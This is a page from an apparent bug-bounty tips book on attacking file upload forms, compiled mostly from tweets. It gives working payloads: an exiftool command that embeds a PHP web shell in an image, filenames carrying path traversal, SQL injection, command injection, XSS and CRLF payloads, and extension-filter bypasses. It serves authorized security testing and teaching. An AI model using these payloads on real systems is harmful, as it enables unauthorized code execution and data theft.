Book of BugBounty Tips
  • Introduction
  • OSINT / Recon
  • API
  • Cross Site Request Forgery (CSRF)
  • Server Side Request Forgery (SSRF)
  • Sensitive Information Disclosure
  • Cross Site Scripting (XSS)
  • CRLF
  • Remote Code Execution (RCE)
  • Email Bypass
  • File Upload
  • Open Redirect
  • Insecure Direct Object Reference (IDOR)
  • Injection
  • XXE
  • Local / Remote File Inclusion
  • Authentication / Authorization
  • Account Takeover
  • Application Login
  • Clickjacking
  • Parameter Pollution
  • Fuzzing
  • Application Logic Bypasses
  • Bypasses
  • Mobile
  • Password Reset
  • Web Cache
  • Server Side Template Injection
  • Tips from @EdOverflow
  • Tips From @intigriti
  • Hackpack From @yeswehack
  • Tips from @YogoshaOfficial
  • Tips from @Jhaddix
  • Tips from Ben (@nahamsec)
  • Tips from Other Sources
  • Tips from Blog posts / other hunters
  • Others
  • Bugbounty Related Websites / Blogs
  • Docker and k8s
  • Tweets Collection by @Pentesterland
  • Windows
  • Linux
  • Burp suite
  • Scope Based Recon Tips
Powered by GitBook
On this page

File Upload

PreviousEmail BypassNextOpen Redirect

Last updated 1 month ago

  • Payloads -

  • Bypass File Upload Filtering In image : exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg mv shell.jpg shell.php.jpg

Chaining file uploads with other vulns:-

 Set filename to:- 

> ../../../tmp/lol.png for path traversals
> sleep(10)-- -.jpg for SQLi.
> <svg onload=alert(document.comain)>.jpg/png for xss
> ; sleep 10; for command injections

Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter.

-

Chaining file uploads with other vulns:
#BugBountyProTip Some caching servers would cache files larger than 2mb. if app accepts file upload, then upload a large file and access it #multiple times while logged-in. It will be cached. Then access it without login, and pingo! unauthenticated access to sensitive files!
Uploader Vuln: Content-Disposition: form-data; name="FactorImage"; filename="Untitled.jpg\test.aspx" Content-Type: image/jpeg Res: {"StoreHousePicture_File":"test.aspx","Success":true}#BugBounty
https://anotherhackerblog.com/exploiting-file-uploads-pt1/
https://anotherhackerblog.com/exploiting-file-uploads-pt-2/
https://github.com/1N3/IntruderPayloads/tree/master/Uploads
Bypassing most FILE Uploads filters for $$$$ * .htaccess <- upload htaccess * file.svg <- uploading svg = xss * file.SVg <- must try case mismatch * file.png.svg * file.php%00.png * file.png' or '1'='1 * ../../file.png * file.'svg <- invalid ext. #bugbountytips #
BugBounty
#bugbountytip
#bugbountytips
Time for another #BugBountyTip : While testing file upload forms on IIS7 servers, you can get RCE by uploading ".cer" files if ".asp" extension is blacklisted. This already let me to multiple RCEs in #bugbounty and #pentest projects. #bugbountytips RT if you love! More coming.
#BugBounty If you find a file upload function for an image, try introducing an image with XSS in the filename like so: <img src=x onerror=alert('XSS')>.png "><img src=x onerror=alert('XSS')>.png "><svg onmouseover=alert(1)>.svg <<script>alert('xss')<!--a-->a.png
Bypassing most FILE Uploads filters for $$$$ * .htaccess <- upload htaccess * file.svg <- uploading svg = xss * file.SVg <- must try case mismatch * file.png.svg * file.php%00.png * file.png' or '1'='1 * ../../file.png * file.'svg <- invalid ext. #bugbountytips #
BugBounty
#BugBounty If you find a file upload function for an image, try introducing an image with XSS in the filename like so: <img src=x onerror=alert('XSS')>.png "><img src=x onerror=alert('XSS')>.png "><svg onmouseover=alert(1)>.svg <<script>alert('xss')<!--a-->a.png
Bypass File Upload Filtering In image : exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg mv shell.jpg shell.php.jpg #bugbountytip #bugbountytips
#Bugbountytip Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter.
bypassing file content restrictions: in some cases you can do a crlf injection via filename x.png%22%0d%0a%0d%0a%0d%0a<script>alert(1)</script> this will cause Content-Disposition to throw its content into the file #bugbounty #xss #crlfinjection #bugbountytip
RT@CyberSecurityN8: RT@infosecsanyam: RT@th3cyb3rc0p: RT@M404ntf: If a web application allow you to upload a .zip file, zip:// is an interesting PHP wrapper to turn a LFI into a RCE. #BugBounty #BugBountyTips #InfoSec